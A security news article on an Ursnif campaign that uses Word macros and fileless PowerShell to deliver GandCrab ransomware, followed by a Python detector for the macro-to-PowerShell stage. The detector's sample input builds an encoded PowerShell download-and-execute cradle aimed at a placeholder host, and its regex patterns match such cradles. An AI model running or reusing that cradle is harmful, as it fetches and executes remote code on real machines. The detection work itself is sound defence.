Researchers warn about a new wave of attacks with an information-stealing Trojan called Ursnif that uses PowerShell and fileless execution mechanisms, making it harder to detect. Some of the attacks also deploy the GandCrab ransomware.

Ursnif, also known as Dreambot, has been around for some time and initially focused on stealing emails and online banking credentials from browsers. However, the Trojan has modules that extend its functionality and has recently been used to deploy other malware as well.

For example, researchers from Carbon Black have observed a spam campaign over the past month that distributes Ursnif, which in turn installs the GandCrab ransomware. “The overall attack leverages several different approaches, which are popular techniques amongst red teamers, espionage focused adversaries and large scale criminal campaigns,” the Carbon Black researchers said in a new report.

The attack chain starts off with spam emails that carry Word documents containing malicious macro scripts. The macros are obfuscated with junk code but are designed to execute an encoded PowerShell command stored in the Alternate Text field of an object inside the document.

Document macros and PowerShell scripts have been extensively abused to install malware on computers over the past few years because attackers like to live off the land and these features are present by default in Windows and Microsoft Office.

Ursnif’s PowerShell script downloads a payload from a hard-coded command-and-control server and executes it directly in memory. This second payload then downloads another file in raw form and injects it into the PowerShell process. The final payload is version 5.0.4 of GandCrab, a ransomware program sold on underground markets as a service, where its creators allow other cybercriminals to use it for a cut of the profits. There’s already a decryption tool available for some GandCrab variants, but this appears to be a newer version.
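A defender-side check for the macro-to-PowerShell stage of that chain, added here as an example and not code from the article or from Carbon Black's report: it decodes the -EncodedCommand argument of PowerShell process-creation events and flags launches whose parent is an Office application or whose script contains an in-memory download cradle. The log events and the URL are constructed, not indicators from the campaign.

```python
import base64
import re

# Constructed sample (not from the article): an encoded in-memory download cradle of
# the kind the macro launches. The URL is a placeholder, not a real indicator.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events as Sysmon Event ID 1 or an EDR would log them.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
CRADLE_RE = re.compile(r"(?i)\b(?:iex|invoke-expression)\b.*"
                       r"\b(?:downloadstring|downloaddata|invoke-webrequest|iwr)\b")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """List why this PowerShell launch resembles the macro-to-cradle chain."""
    reasons = []
    if event["parent"].lower().endswith(OFFICE_PARENTS):
        reasons.append("office_parent")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        reasons.append("encoded_command")
    # Match the cradle in the decoded script when there is one, else in the raw line.
    if CRADLE_RE.search(decoded or event["cmdline"]):
        reasons.append("download_cradle")
    return reasons

def find_suspicious(events):
    """Index every event with an Office parent or a download cradle."""
    hits = [(i, classify(e)) for i, e in enumerate(events)]
    return [(i, r) for i, r in hits if "office_parent" in r or "download_cradle" in r]
```

Running it over SAMPLE_EVENTS flags only the first event, for all three reasons; the scheduled script launched from Explorer passes.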
